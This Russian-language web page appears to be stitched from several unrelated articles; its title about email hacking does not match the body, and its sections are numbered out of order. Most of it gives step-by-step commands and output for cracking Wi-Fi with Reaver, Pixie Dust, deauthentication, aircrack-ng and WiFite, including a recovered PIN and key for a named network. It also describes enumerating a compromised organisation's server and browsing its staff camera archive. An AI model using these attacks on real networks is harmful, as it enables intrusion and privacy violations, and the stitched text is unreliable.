Как взломать почту при помощи hydra из kali linux

Как найти Wi-Fi сети с поддержкой WPS

Для запуска программы в отношении Точки Доступа Wi-Fi необходимо знать её BSSID, то есть её MAC-адрес. BSSID точек доступа можно посмотреть, к примеру, программой Airodump-ng. Эта программа требует режима монитора. Но давайте исходить из того, что у нас обычный Wi-Fi адаптер, который не поддерживает режим монитора.

Выход из этой ситуации есть — BSSID распространяется в обычных фреймах (маячках) и операционная система всегда знает BSSID каждой Точки Доступа в округе (хотя обычно и не показывает эту информацию, поскольку большинству пользователей она не нужна).

Прежде чем приступить, начнём с того, что остановим NetworkManager, поскольку он постоянно будет мешаться нам:

sudo systemctl stop NetworkManager

Теперь нам нужно узнать имя беспроводного интерфейса. В Kali Linux это обычно wlan0. Если вы не знаете имя интерфейса в вашей системе, то выполните команду:

sudo iw dev

Будет выведено примерно следующее:

phy#0
	Interface wlan0
		ifindex 3
		wdev 0x1
		addr 7e:ef:a8:b2:43:60
		type managed
		txpower 20.00 dBm

Строка, которая начинается на Interface, и содержит имя интерфейса.

Нужно активировать Wi-Fi адаптер командой вида:

sudo ip link set ИНТЕРФЕЙС up

Где вместо ИНТЕРФЕЙС нужно вставить имя вашего беспроводного интерфейса. Для wlan0 команда будет такой:

sudo ip link set wlan0 up

Чтобы операционная система просканировала Точки Доступа в пределах досягаемости и показала нам информацию по ним, запустите такую команду:

sudo iw dev ИНТЕРФЕЙС scan

Для wlan0:

sudo iw dev wlan0 scan

После сканирования, скорее всего, информации будет выведено ОЧЕНЬ много, пролистывайте и ищите те ТД для которых имеется поле WPS, например:

	WPS:	 * Version: 1.0
		 * Wi-Fi Protected Setup State: 2 (Configured)
		 * Response Type: 3 (AP)
		 * UUID: 0be8e40b-92b5-23fc-a1ca-72fbf138036f
		 * Manufacturer: TC7200
		 * Model: TC7200
		 * Model Number: 123456
		 * Serial Number: 0000001
		 * Primary Device Type: 6-0050f204-1
		 * Device name: TechnicolorAP
		 * Config methods: Display
		 * RF Bands: 0x1

Это хорошо, пролистываю чуть вверх, чтобы увидеть BSSID этой точки доступа:

BSS b0:c2:87:4b:e0:fd(on wlan0)
	TSF: 125911554303 usec (1d, 10:58:31)
	freq: 2412
	beacon interval: 100 TUs
	capability: ESS Privacy ShortSlotTime RadioMeasure (0x1411)
	signal: -67.00 dBm
	last seen: 9352 ms ago
	Information elements from Probe Response frame:
	SSID: Mr.yongyut Daengluead 2G
	Supported rates: 1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 
	DS Parameter set: channel 1
	ERP: Barker_Preamble_Mode
	ERP D4.0: Barker_Preamble_Mode

В этом списке BSSID называется BSS и для данной Точки Доступа значение равно b0:c2:87:4b:e0:fd. Больше нам никакая информация не нужна, но отметим, что уровень сигнала хороший, а имя этой точки доступа Mr.yongyut Daengluead 2G:

	signal: -67.00 dBm
	SSID: Mr.yongyut Daengluead 2G

Что такое WPS

Wi-Fi Protected Setup (защищённая установка), WPS — стандарт (и одноимённый протокол) полуавтоматического создания беспроводной сети Wi-Fi.

WPS придумывался для упрощения развёртывания и подключения к Wi-Fi сетям.

Есть два типа WPS: WPS с пин-кодом из 8 цифр, на клиенте нужно ввести тот же код, что и на точке доступа, и кнопка WPS — нужно нажать кнопку на точке доступа и на клиенте с интервалом меньше двух минут, тогда они соединятся друг с другом.

Точки доступа, у которых включён WPS, уязвимы к атаке брут-форса (перебора) данного ПИНа. После того, как подобран WPS ПИН можно подключиться к точке доступа, а также узнать её WPA/WPA2 пароль. Перебор возможен только на точках доступа, для которых нужно вводить цифры, но невозможен там, где нужно нажимать кнопки.

Всего необходимо перебрать только 11000, что можно сделать за часы-дни.

Для перебора WPS ПИНов используются разные программы, самыми популярными являются Reaver и Bully. В данной инструкции я покажу, как использовать Reaver для взлома Wi-Fi.

Перевод беспроводной карты в режим монитора

Для поиска сетей с WPS, а также для атаки на них нам понадобиться перевести Wi-Fi карту в режим монитора.

Закрываем программы, которые могут помешать нашей атаке:

sudo systemctl stop NetworkManager
sudo airmon-ng check kill

Узнаём имя беспроводного интерфейса:

sudo iw dev

И переводим его в режим монитора (замените wlan0 на имя вашего интерфейса, если оно отличается):

sudo ip link set wlan0 down
sudo iw wlan0 set monitor control
sudo ip link set wlan0 up

Новый сетевой интерфейс в режиме монитора также называется wlan0.

Если у вас другое имя беспроводного сетевого интерфейса, то во всех последующих командах вставляйте его вместо wlan0.

2 Reaver

Number 2 in the Top 10 Wifi Hacking Tools is Reaver. Reaver is another popular tool for hacking wireless networks and targets specifically WPS vulnerabilities. Reaver performs brute force attacks against Wifi Protected Setup (WPS) registrar PINs to recover the WPA/WPA2 passphrase. Since many router manufacturers and ISPs turn on WPS by default a lot of routers are vulnerable to this attack out of the box.

In order to use Reaver you need a good signal strength to the wireless router together with the right configuration. On average Reaver can recover the passphrase from vulnerable routers in 4-10 hours, depending on the access point, signal strength and the PIN itself off course. Statistically you have a 50% chance of cracking the WPS PIN in half of the time.

Website: https://code.google.com/p/reaver-wps/
Tutorial: https://www.hackingtutorials.org/wifi-hacking/pixie-dust-attack-wps-in-kali-linux-with-reaver/

Справка по WiFite

опциональные аргументы:
  -h, --help           показать справку и выйти

НАСТРОЙКИ:
  -i        Беспроводной интерфейс для использования (по умолчанию: спрашивать)
  -c          Беспроводные каналы для сканирования (по умолчанию: все каналы)
  -5, --5ghz           Включая 5Ghz каналы (по умолчанию: выключено)
  -b            BSSID (например, AA:BB:CC:DD:EE:FF) точки доступа для атаки
  -e            ESSID (имя) точки доступа для атаки
  -v, --verbose        Вербальный режим, печатать все строки (по умолчанию: тихий)

WEP:
  --wep                Показывать только сети с шифрованием WEP (по умолчанию: выключено)
  --require-fakeauth   Атака не удалась, если не удалась фальшивая аутентификация (по умолчанию: выключено)
  --pps           Пакетов в секунду для восроизведения (по умолчанию: 600 pps)
  --wept      Ожидать секунд перед неудачей (по умолчанию: 600 секунд)
  --wepca         Запустить взлом на этом количестве IVs (по умолчанию: 10000 ivs)
  --weprs     Перезапустить aireplay если не появляются новые IVs (по умолчанию: 11 секунд)
  --weprc     Перезапустить aircrack после этой задержки (по умолчанию: 30 секунд)
  --arpreplay          Использовать WEP атаку ARP-воспроизведения (по умолчанию: включено)
  --fragment           Использовать атаку WEP фрагментации (по умолчанию: включено)
  --chopchop           Использовать WEP атаку чоп-чоп (по умолчанию: включено)
  --caffelatte         Использовать WEP атаку Кафе латте (по умолчанию: включено)
  --p0841              Использовать WEP атаку p0841 (по умолчанию: включено)
  --hirte              Использовать WEP атаку ARP-воспроизведения (по умолчанию: включено)

WPA:
  --wpa                Показывать только сети с WPA шифрованием (включая WPS)
  --wpadt     Время ожидания перед отправкой деаутентификации (по умолчанию: 10 секунд)
  --wpat      Время ожидания, чтобыб признать атаку WPA неудачной (по умолчанию: 500 секунд)
  --hs-dir        Директория для сохранения рукопожатий files (по умолчанию: hs)
  --dict         Файл, содержащий пароли для взлома (по умолчанию: None)
  --strip              Очистить ненужные пакеты из захваченного рукопожатия используя tshark или pyrit

WPS:
  --wps                Показывать только сети с WPS
  --reaver             Использовать ТОЛЬКО Reaver на WPS сетях (по умолчанию: выключено)
  --no-reaver          НЕ использовать Reaver на WPS сетях (по умолчанию: выключено)
  --pixie              Использовать только атаку WPS Pixie-Dust (по умолчанию: выключено)
  --pixiet    Время ожидания перед признанием атаки PixieDust неудачной (по умолчанию: 300 секунд)
  --pixiest   Время ожидания для шага прогресса перед признанием атаки PixieDust неудачной (по умолчанию: 30 секунд)
  --wpst      Время ожидания перед признанием атаки WPS PIN неудачной (по умолчанию: 600 секунд)
  --wpsmr     Максимальное количество попыток перед признанием неудачи (по умолчанию: 20)
  --wpsmf       Максимальное число неудач Reaver перед признанием атаки провалившейся (по умолчанию: 30)
  --wpsmt    Максимальное количество таймаутов перед остановкой (по умолчанию: 30)
  --ignore-ratelimit   Игнорировать атаку, если WPS ограничен по скорости (по умолчанию: включено)

КОМАНДЫ:
  --cracked            Показать ранее взломанные точки доступа
  --check        Проверить .cap файлы (или все hs/*.cap файлы) на WPA рукопожатия

5 Wireshark

Wireshark is one of the best network protocal analyzer tools available, if not the best. With Wireshark you can analyse a network to the greatest detail to see what’s happening. Wireshark can be used for live packet capturing, deep inspection of hundreds of protocols, browse and filter packets and is multiplatform.

Wireshark is included with Kali Linux but also available for Windows and Mac. For certain features you do need a Wifi adapter which is supports promiscuous and monitoring mode.

Website: https://www.wireshark.org
Tutorial: https://www.howtogeek.com/104278/how-to-use-wireshark-to-capture-filter-and-inspect-packets/

Or follow one of these online courses:
– Wireshark Crash Course
– Wireshark Tutorial – Get Wireshark Certification

Обзор Wi-Fi сетей

Чтобы атаковать Wi-Fi сеть нам нужно знать некоторые её характеристики. Чтобы получить список всех доступных в диапазоне досягаемости Wi-Fi сетей выполните команду:

sudo airodump-ng wlan0

Обратите внимание, что если у вас другое имя беспроводного интерфейса, то вместо wlan0 вам нужно вписать это имя.

Описанная атака применима только для сетей с защитой WPA2 или WPA – таких подавляющее большинство.

Будет выведен похожий список сетей:

Когда вы увидите в списке сеть, которую хотите атаковать, то остановите программу, для этого нажмите CTRL+c.

Предположим, меня интересует сеть с ESSID (именем) dlink. Как видно из скриншота, её характеристиками являются: BSSID – это 00:1E:58:C6:AC:FB, она использует WPA2, работает на шестом канале. Также ненулевое значение #Data (захваченные данные, отправляемые это ТД) позволяет предположить, что к ней подключена одна или более станций.

Для захвата рукопожатия используется команда следующего вида:

sudo airodump-ng -c КАНАЛ --bssid MAC_АДРЕС -w ФАЙЛ ИНТЕРФЕЙС

Где:

  • КАНАЛ – это канал, на котором работает ТД
  • MAC_АДРЕС – это BSSID атакуемой ТД
  • ФАЙЛ – имя файла, куда будет записано рукопожатие
  • ИНТЕРФЕЙС – имя беспроводного интерфейса в режиме монитора

Для моих данных команда выглядит так:

sudo airodump-ng -c 6 --bssid 00:1E:58:C6:AC:FB -w capture wlan0

На следующем скриншоте вновь видна интересующая нас ТД, а также теперь виден раздел со станциями:

В полном списке ТД раздел со станциями также присутствовал, но уходил за нижний край экрана, поэтому на скриншот не попал.

Для станции мы в поле BSSID мы можем увидеть значение, которое соответствует BSSID Точки Доступа, т.е. 00:1E:58:C6:AC:FB, это означает, что в данный момент эта Станция подключена к интересующей нас ТД. Теперь имеется два варианта:

1) ждать пока Станция отсоединится и вновь подключится к ТД по естественным причинам

2) выполнить атаку деаутентификация для ускорения процесса

Автоматизированный взлом Wi-Fi в WiFite

Для этого программу WiFite нужно запустить с двумя дополнительными опциями:

  • —crack говорит о том, что нужно производить взлом по словарю
  • —dict ~/newrockyou.txt указывает, какой словарь использовать
sudo wifite --crack --dict ~/newrockyou.txt

После запуска подождите несколько минут, пока программа соберёт информация о доступных точках доступа:

Когда информации достаточно, нажмите CTRL+C.

Нас попросят ввести номера точек доступа, которые мы хотим взломать. Можно выбрать все (нужно ввести all), можно выбрать отдельные ТД, перечислив их через запятую, можно выбрать диапазоны, перечислив их через дефис:

Дальше программа всё будет делать сама. Если вам показалось, что программа на слишком уж долго застряла на какой-либо точке доступа или на какой-либо атаке, то нажмите один раз CTRL+C для перехода к следующему действию. У нас спросят — мы хотим немедленно выйти или продолжить:

Наберите c, чтобы продолжить.

Полный перебор WPS пинов с Reaver

Если ни один из описанных методов не помог, то переходим к полному перебору, который может занять часы или даже сутки.

Команда для запуска перебора похожа на предыдущую, но отсутствует опция, запускающая атаку Pixie Dust:

sudo reaver -i интерфейс -b MAC_адрес_ТД

Перебор WPS пинов может идти неудачно по многим причинам, поэтому для более подробного вывода, чтобы определить, в чём проблема, используются опции -v, -vv или -vvv. Как можно догадаться, чем больше букв v, тем больше будет выведено подробной информации.

Дополнительную информацию о других опциях Reaver, а также подробное описание других ходовых опций, вы найдёте здесь: https://kali.tools/?p=355

Атака Pixie Dust

Теперь нужно запустить команду вида:

sudo python3 oneshot.py -i wlan0 -b BSSID -K

В этой команде BSSID нужно заменить на действительное значение для интересующей точки доступа. Например:

sudo python3 oneshot.py -i wlan0 -b b0:c2:87:4b:e0:fd -K

Полученный вывод:

 Running wpa_supplicant...
 Trying PIN "12345670"...
 Scanning...
 Authenticating...
 Authenticated
 Associating with AP...
 Associated with B0:C2:87:4B:E0:FD (ESSID: Mr.yongyut Daengluead 2G)
 Sending EAPOL Start...
 Received Identity Request
 Sending Identity Response...
 Received WPS Message M1
 E-Nonce: 460029BB72C930E71309524CB331A25D
 Sending WPS Message M2...
 PKR: 53E94D34306AA115199C7F1DDBA2CC7572F60D64A9EF6F6A6211416CDA2EB679C00BF9297D00895FFE412AD90BE5A33D902EF9200229E5A88C63892B3FC9366B110EF71853E5F93037036041A1DACFFC3CAB59ACB12A9D9EF8DB47F2F0F5C98C95830CBD7689C18B34B1A839C1C5975E99CDC507594D76C0F5CE1CEC85207478A16B50F05E4E5F20CB804B1E58D734939F736EF899AE4C9CFE818A72DCA72E19845737E3765B23C4A0F746F6876DECF3680EFAD08FEE156B152F56A572151A72
 PKE: CADFCC3F2D87D4EFBAF35A7541C50D966BAC20BD3FB204AC8883F8B77E8F557F2F2D2D796E13FC3DA98BDAEFC5C76CFDD90283E715988C7C61A0456632E436705C8978A1F210533A1FF70BEE8F1BF0026037C5922DC4E2A7E99AC4AFD679A627809DA03362BC674E0200E78E0F686F7C77B17A02C502F87FF697F35D8BCDA364B515CD3DB37B17F84BDA76C1E8C63C3DC23F7E306701AB201F85D701DFF1D3102D59A6BDF6A4153D6C40EC2690E1178639BE85314DC7C0EC39AA0885455D4D4C
 AuthKey: DD5238440D336186241B11838D46970E9DA9E9715CF4221374875F09310F8EC6
 Received WPS Message M3
 E-Hash1: 2D7CD407438467EE2C14FD9F58A8E81CCD7AADA2D6913DF5B43F059B55C417ED
 E-Hash2: 164CA34B538C84ED15C676B09D84CCE2347EF4944D2F51086CEA7F517707F423
 Sending WPS Message M4...
 Received WPS Message M5
 Sending WPS Message M6...
 Received WPS Message M7
 WPS PIN: '12345670'
 WPA PSK: '0619560772'
 AP SSID: 'Mr.yongyut Daengluead 2G'

Узнанный ПИН находится в строке WPS PIN, пароль от Wi-Fi в строке WPA PSK, а название точки доступа в строке AP SSID:

 WPS PIN: '12345670'
 WPA PSK: '0619560772'
 AP SSID: 'Mr.yongyut Daengluead 2G'

То есть эта ТД Wi-Fi не прошла аудит безопасности…

В случае неудачи на нашей стороне, будет выведено что-то вроде:

 WPS-FAIL error
 No enough data to run Pixie Dust attack

Выполнение атаки деаутентификация

Для выполнения деаутентификации, не прекращая записи трафика, запущенного на предыдущем этапе, откройте новое окно консоли и введите туда команду вида:

sudo aireplay-ng -0 3 -a MAC_АДРЕС ИНТЕРФЕЙС

Где:

  • MAC_АДРЕС – это BSSID атакуемой ТД
  • ИНТЕРФЕЙС – имя беспроводного интерфейса в режиме монитора

В моём случае команда выглядит так:

sudo aireplay-ng -0 3 -a 00:1E:58:C6:AC:FB  wlan0

Программа выведет примерно следующее:

08:17:30  Waiting for beacon frame (BSSID: 00:1E:58:C6:AC:FB) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
08:17:30  Sending DeAuth to broadcast -- BSSID: 
08:17:30  Sending DeAuth to broadcast -- BSSID: 
08:17:31  Sending DeAuth to broadcast -- BSSID: 

А в правом верхнем углу экрана для захвата данных появится новая запись:

WPA handshake: 00:1E:58:C6:AC:FB

Она означает, что рукопожатие успешно захвачено.

10. Поиск слабых настроек сервера

Итак, из веб-сайтов мы уже вытрясли всё, что только можно, — исходный код, базы данных, пароли пользователей.

Теперь давайте осмотримся на самом сервере — к чему у нас есть доступ, какие настройки являются слабыми, какую информацию мы можем получить о системе, пользователях, запущенных службах.

Всё это можно делать вручную запуская утилиты в командной строке или воспользоваться одной из программ автоматизации. Например, я применю LinEnum. Подробности работы с ней описаны в «Аудит безопасности хостинга и других совместно используемых систем на Linux».

Скачиваем её:

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Запускаем:

bash LinEnum.sh

И ждём результатов.

Информации много. Информацию о системе и ядре можно использовать для поиска эксплойтов, которые выполняют эскалацию привилегий — повышение прав.

Получена информация о пользователях (имя, IP, дата последнего входа), выполнявших вход в систему, — их имена можно использовать для брут-форса (подбора пароля методом перебора) SSH. Причём у одного из пользователей локальный адрес 10.*.*.* — это даёт нам подсказку о структуре локальной сети.

Показано, кто из пользователей является администратором, а также аккаунты, кто недавно использовал sudo (то есть у кого есть право выполнять команды с повышенными привилегиями — такие аккаунты представляют первостепенный интерес).

Собрана информация о сетевых интерфейсах, показан локальный IP — можно выполнить сканирование сети в поисках других подключённых устройств.

Показаны прослушиваемые порты (те, к которым можно подключиться) — их много. Их стоит проверить, так как там могут быть интересные службы.

Информация о запущенных процессах говорит о том, что работает почтовый сервер, прокси, DNS сервер, служба IP камер.

Собраны номера версий популярных служб — на случай, если мы будем искать эксплойты.

Среди интересных файлов внезапно обнаружился nmap — можно сканировать хост прямо с самого себя — это даст супер быстрые результаты.

Как запустить WiFite

Начать нужно с перевода беспроводной карты в режим монитора. Как это сделать рассказано в соответствующей статье «Как перевести беспроводную карту в режим монитора (контроля) в Kali Linux».
В моём случае команда следующая:

ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up

Нам в любом случае нужен файл словаря. Следующими командами мы его копируем в текущую рабочую директорию, распаковываем и чистим (чтобы все кандидаты в пароли удовлетворяли требованиям WPA паролей).

cp /usr/share/wordlists/rockyou.txt.gz .
gunzip rockyou.txt.gz
cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > newrockyou.txt

Ещё немного теории. WiFite это программа «полного цикла» по взлому Wi-Fi точек доступа. Она всё делает хорошо, но такой этап как перебор паролей можно делать не только хорошо — его можно делать на отлично. Процесс перебора паролей можно значительно ускорить, если использовать Pyrit, но уже требует определённых навыков.

Давайте начнём с совсем простого — пусть WiFite всё делает сама.

9. Камеры

Без камер сейчас никуда: в комнате отдыха воруют печеньки, на рабочих местах работники не работают, в туалетах промахиваются мимо писсуара… Эта организация тоже не исключение. Я не просто так в первой части показал, как проверять размер папок и как выборочно архивировать папки веб-сервера. Два хоста оказались хранилищем фотографий на десятки гигабайт. Там всё пристойно, единственное что, камеры со встроенным датчиком движения, поэтому запись происходит только когда в комнате кто-то есть. Одна из камер установлена в комнате отдыха — там где чаёк, еда, телевизор. Так вот, если на ускоренном темпе просматривать эти фотографии (получается как видео), то создаётся сюрреалистическое впечатление, что люди в этой организации без конца жрут… День проходит так: восходит солнышко, заходят первые люди и начинают пить кофе, затем начинают есть, затем они уходят и начинают есть другие, затем приходят ещё больше людей и тоже начинают есть, потом эти уходят и приходят другие со своей едой и опять едят, и это повторяется и повторяется пока не наступит закат… Затем следующий день — точно такой, люди едят-едят-едят и вот такого почти на 100 Гигабайт…

Причём веб-интерфейс со слабым паролем для просмотра всего этого «добра» расположен на поддомене сайта, доступного из Глобальной сети.

Смотрим стандартным способом в гаджете

Рассмотрим способ, как узнать пароль от своего wifi в телефоне самый простой и быстрый. Но, к сожалению, он подходит не для каждой модели телефона. Воспользоваться этим методом может любой человек, здесь не нужны особые познания. Достаточно войти в настройки точки доступа и там посмотреть ключ от необходимой сети. Подробное описание, как это сделать, смотрите ниже.

  • Первое что необходимо сделать, это войти в раздел «Настройки», «Еще…».
  • Выберите пункт «Режим модема», «Настройка точки доступа».
  • Появятся настройки, где необходимо поставить птичку «Показать пароль». У вас покажется в графе «Пароль» необходимый ключ.

Имейте в виду, данный ключ, при настройке точки доступа (WLAN), не обязательно будет схож с паролем от вай фай. Просто некоторые гаджеты автоматически вставляют ключ от WiFi роутера в настройки точки доступа.

Мы показали вам, как посмотреть свой пароль от wifi на смартфоне, хоть он и далеко не каждому подойдет, но попробовать его стоит.

Атака по словарю на пароль Wi-Fi

Теперь нам нужно запустить перебор данных.

Подготовим словарь:

cp /usr/share/wordlists/rockyou.txt.gz .
gunzip rockyou.txt.gz
cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > newrockyou.txt

Файл словаря в этом случае называется newrockyou.txt.

Чтобы узнать имя захваченного рукопожатия выполните команду:

ls -l capture*

При этом будет выведено что-то вроде следующего (записей может быть больше, если вы неоднократно захватывали рукопожатия):

-rw-r--r-- 1 root root 73164 сен 30 08:24 capture-01.cap
-rw-r--r-- 1 root root   478 сен 30 08:24 capture-01.csv
-rw-r--r-- 1 root root   583 сен 30 08:24 capture-01.kismet.csv
-rw-r--r-- 1 root root  2766 сен 30 08:24 capture-01.kismet.netxml

Нас интересует только файл capture-01.cap – именно он содержит рукопожатие.

Для перебора по словарю используется следующая команда:

aircrack-ng -w ФАЙЛ_СЛОВАРЯ ФАЙЛ_ЗАХВАТА

Итак, в моём случае точная команда следующая:

aircrack-ng -w newrockyou.txt capture-01.cap

Эта команда запускает подбор пароля, в процессе перебора показывается следующее окно:

Пароль подобран:

Об этом говорит запись KEY FOUND! , в которой паролем от Wi-Fi сети является pattayateam. Используя этот пароль можно подключиться к беспроводной точке доступа с любого устройства (компьютера, телефона) как это делают другие легитимные пользователи.

Вопросы и ответы по Wi-Fi в Linux

Почему меняется MAC адрес, даже если не используется программа для этого

Многие современные дистрибутивы настроены постоянно менять MAC адрес. Подробности об этом, а также как отключить или наоборот включить эту функцию смотрите в статье «Как поменять MAC-адрес в Linux, как включить и отключить автоматическую смену (спуфинг) MAC в Linux».

Как узнать, будет ли поддерживаться Wi-Fi карта для аудита Wi-Fi сетей

Самый простой вариант, это выбрать адаптер из данного списка: «USB Wi-Fi адаптеры с поддержкой режима монитора и беспроводных инъекций».

Если вы хотите определить, поддерживает режим монитора и беспроводные инъекции другой адаптер, не включённый в список, то изучите «Как определить, какой Wi-Fi адаптер подойдёт для Kali Linux».

Современные Wi-Fi карты для беспроводного аудита

Двухдиапазонные беспроводные адаптеры с поддержкой режима монитора и беспроводными инъекциями, а также с поддержкой стандарта AC:

  • Alfa AWUS1900 (чипсет: Realtek RTL8814AU)
  • TRENDnet TEW-809UB (чипсет: Realtek RTL8814AU)
  • ASUS USB-AC68 (чипсет: Realtek RTL8814AU)
  • Alfa AWUS036ACH (чипсет: Realtek RTL8812AU)
  • Alfa AWUS036AC (чипсет: Realtek RTL8812AU)
  • ASUS USB-AC56 (чипсет: Realtek RTL8812AU)

Любой из этих адаптеров будет актуален ещё много лет.

Как увидеть, что происходит с беспроводными интерфейсами

Следующие команды помогут вам увидеть абсолютно всё, что происходит за сценой во время, например, неудачных подключений.

Вы можете использовать вывод следующих команд для решения любых проблем с Wi-Fi.

Следующая команда в реальном времени будет показывать всё, что происходит в вашей системе — например, при подключении беспроводного адаптера, она покажет, какой драйвер загружен или какие проблемы возникли. Также будут выведены сообщения от приложений:

journalctl -f

Следующая команда расскажет о всё, что происходит на уровне — как IP адреса присваиваются интерфейсам и какие маршруты прописываются в системе:

ip monitor

А эта команда покажет все события, связанные с беспроводными сетевыми интерфейсами:

iw event

Эти три команды — важнейший источник информации для разрешения неочевидных проблем. Изучайте их вывод или предоставьте вывод этих команд если вы пытаетесь совместно разрешить вашу проблему с Wi-Fi.

Как узнать, сколько трафика было передано

ip -s -h a show <ИНТЕРФЕЙС>

Почему в Wi-Fi на 5 ГГц недоступны каналы между 64 и 100

С помощью команды

iw list

можно посмотреть, какие частоты поддерживает ваша Wi-Fi карта.

Пример вывода:

Ещё один пример:

Набор каналов чуть различается, но в любом случае частоты в диапазоне каналов 64-100 полностью недоступны. То есть они даже не отключены, а как бы просто не существуют.

Возможно вам тоже любопытно, почему существует разрыв между каналом 64 и 100 в Wi-Fi 5 ГГц?

Ответ 1:

В диапазоне 5,35–5,46 ГГц перечислены различные применения, включая «Воздушную радионавигацию». Здесь будут каналы с 68 по 96. Очевидно, они не хотят, чтобы оборудование с поддержкой Wi-Fi было включено даже случайно, что может помешать навигации самолёта.

Ответ 2:

Эти каналы используются совместно с метеорологическим радаром. Маршрутизатор, использующий эти каналы, должен проверить наличие метеорологического радара. Если обнаружен метеорологический радар, маршрутизатор должен переключиться на другой канал, на котором нет метеорологического радара. Я не помню, как быстро маршрутизатор должен прекратить использовать канал. Это может быть 10 минут.

Если маршрутизатор переключает каналы WiFi, клиенты обычно не переключаются. Все, что было подключено, теряет связь. Я думаю, что контроллер может переключить клиентов на новый канал до того, как старый отключится, но опять же я не уверен.

Это может быть корпоративное оборудование. Потребители не могут себе этого позволить.

Итак

Отсутствие упоминания канала в списке поддерживаемых частот, а также следующая запись означают, что ваше Wi-Fi устройство не способно работать на этом канале:

5340 MHz  (disabled)

Вы также можете увидеть записи с «no IR»:

5180 MHz  (22.0 dBm) (no IR)

Флаг no-ir (no-initiating-radiation) переводится как «отсутствие инициирующего излучения», то есть канал в принципе может использоваться, но не может первым отправить никакие данные, то есть он будет задействован только если получит от роутера beacon (маяки) на этих частотах.

Также можно увидеть записи с «no IR, radar detection»:

5260 MHz  (22.0 dBm) (no IR, radar detection)

Как узнать пароль от своего Wi-Fi на компьютере

Для просмотра пароля от своего подключенного Wi-Fi должно соблюдаться условие, что пароль сохранялся на компьютере хотя бы один раз. Если нет, то пароль Wi-Fi следует смотреть на роутере.

Для того, чтобы узнать пароль от своей Wi-Fi сети на компьютере или ноутбуке под управлением Windows 7, 8, 10 проделайте следующие операции:

Откройте «Центр управления сетями и общим доступом». Проще всего это сделать, кликнув меню «Пуск» и набрать в поиске название меню. Также, вы можете кликнуть правой кнопкой мыши по иконке сетевого подключения в правом нижнем углу или найти данное меню в Панели управления. Нажмите на рисунок для увеличения.

В открывшемся окне показываются основные данные об активной сети Wi-Fi. Кликните по активному беспроводному подключению как на скриншоте ниже

В открывшемся окне откройте «Свойства беспроводной сети».

Перейдите во вкладку «Безопасность» и поставьте галку «Отображать вводимые знаки». В поле рядом Вы увидите пароль от Вашего вай-фая.

Если по каким-то причинам при выборе галки «отобразить вводимые знаки» пароль не отображается, то попробуйте посмотреть пароль от Wi-Fi на роутере. Об этом написано в этой статье чуть ниже.

Узнаем пароль от своей Wi-Fi сети в Windows XP

На операционной системе Windows XP посмотреть пароль сохраненной Wi-Fi сети несколько сложнее, чем на более современных ОС, но тем не менее возможно.

Откройте меню «Пуск» в левом нижнем углу компьютера и зайдите в «Панель управления».

Перейдите в меню «Мастер беспроводных сетей» в панели управления.

В открывшемся окне мастера беспроводных сетей нажмите «Далее».

В следующем окне выберите «Добавить новые компьютеры или устройства сети» и нажмите «Далее».

Выберите способ установки сети. Для этого кликните «Установить сеть вручную» и нажмите «Далее».

В итоговом окне мастера настройки беспроводной сети Windows XP нажмите «Напечатать параметры сети».

В результате этого у вас откроется текстовый документ с различными настройками Wi-Fi подключения, в том числе и паролем. Строка с паролем будет называться «Ключ сети (WEP/WPA-ключ)».

Программы для просмотра сохраненных паролей Wi-Fi

Рассмотрим две программы для просмотра паролей сохраненных вай-фай сетей на компьютере.

WiFi Password Decryptor — бесплатная программа для восстановления паролей сохраненных Wi-Fi сетей. Программа расшифровывает все типы паролей Wi-Fi сетей WEP, WPA, WPA2, а также генерирует всю информацию в удобный отчет в формате HTML/XML/TEXT/CSV.

Скачать программу WiFi Password Decryptor можно на официальном сайте её разработчика.

После скачивания .zip архива распакуйте содержимое и запустите файл установки Setup_WiFiPasswordDecryptor.exe. После этого просто запустите программу и кликните на название интересующей Вас вай-фай сети для просмотра пароля.

Видео работы программы WiFi Password Decryptor показана ниже:

WirelessKeyView — небольшая бесплатная утилита, которая выводит список всех сохраненных когда-либо на компьютере вай-фай сетей. У программы англоязычный интерфейс, но при необходимости на сайте разработчика опубликован .ini файл русификатора.

Скачать программу можно с официального сайта разработчика. После скачивания .zip архива распакуйте его и запустите файл WirelessKeyView.exe.

На скриншоте Вы можете наблюдать работу программы. В столбце Network отображаются сохраненные на компьютере сети Wi-Fi, а пароль можно увидеть в столбце Key (Ascii).

Видео работы программы WiFi Password Decryptor:

Узнаем пароль от своего вай-фая через командную строку

Для того, чтобы узнать пароль от своей Wi-Fi сети с помощью командной строки нажмите меню «Пуск» — «Служебные» — «Командная строка» или нажмите комбинацию клавиш Win+R, напишите команду cmd и нажмите ОК.

В открывшейся командной строке впишите следующую команду:

Программа выведет на экране список всех вай-фай сетей, которые сохранены на данном компьютере и соответственно от которых мы можем посмотреть сохраненный пароль.

Для того, чтобы узнать пароль от интересующей вас Wi-Fi сети необходимо в команду

внести её название. Например, для моей домашней сети ALESKA команда выглядит следующим образом:

В результате выполнения этой команды в командной строке получаем всю необходимую информацию, в том числе и пароль от указанной Wi-Fi сети.

На скриншоте выше видно, что пароль от Wi-Fi сети ALESKA соответствует значению 180700.

Видео как узнать пароль своей Wi-Fi сети через командную строку:

Заключение

Когда я писал эту статью, то ставил перед собой цель помочь читателям как можно быстрее получить практический результат с нуля и почти без ущерба для понимания сути процесса. Мне хотелось уместить в одну публикацию все для мощного старта и зажечь искру интереса, которая подвигнет на самостоятельное продолжение.

На курсах по пентестам я не раз обращал внимание, что за свои кровные вы получаете инфу не первой свежести. В ответ преподаватели обычно говорили, что рассказывают основы, суть не меняется годами, поэтому вы уж сами погуглите и доработайте наши материалы напильником

На мой взгляд, суть как раз в деталях, а они меняются очень быстро. Надеюсь, мой вымученный конспект поможет набрать крутизны вашей кривой обучения.

Оцените статью
Рейтинг автора
5
Материал подготовил
Андрей Измаилов
Наш эксперт
Написано статей
116
Добавить комментарий